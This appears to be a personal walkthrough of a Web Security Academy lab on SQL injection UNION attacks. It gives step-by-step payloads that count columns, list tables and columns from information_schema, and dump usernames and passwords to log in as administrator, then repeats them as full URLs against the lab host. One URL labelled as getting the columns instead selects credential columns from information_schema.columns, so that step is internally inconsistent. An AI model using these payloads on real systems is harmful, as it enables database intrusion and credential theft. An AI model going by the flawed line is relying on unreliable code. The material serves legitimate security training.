1. Use Burp Suite to intercept and modify the request that sets the product category filter.
2. Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter: '+UNION+SELECT+'abc','def'--.
3. Use the following payload to retrieve the list of tables in the database: '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
4. Find the name of the table containing user credentials.
5. Use the following payload (replacing the table name) to retrieve the details of the columns in the table: '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
6. Find the names of the columns containing usernames and passwords.
7. Use the following payload (replacing the table and column names) to retrieve the usernames and passwords for all users: '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--
8. Find the password for the administrator user, and use it to log in.

GET the NO of columns and Data types

'+UNION+SELECT+'abc','def'--.

Get All Tables

'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

Get All Columns from users_uenqft table

https://acbf1f521ead714ac01047a1006000c1.web-security-academy.net/filter?category=Pets'+UNION+SELECT+username_audqir,+password_qddmam +FROM+information_schema.columns+WHERE+table_name=%27users_uenqft%27--

Get username_audqir and password_qddmam from users_uenqft table

https://acbf1f521ead714ac01047a1006000c1.web-security-academy.net/filter?category=Pets'+UNION+SELECT+username_audqir,+password_qddmam +FROM+users_uenqft--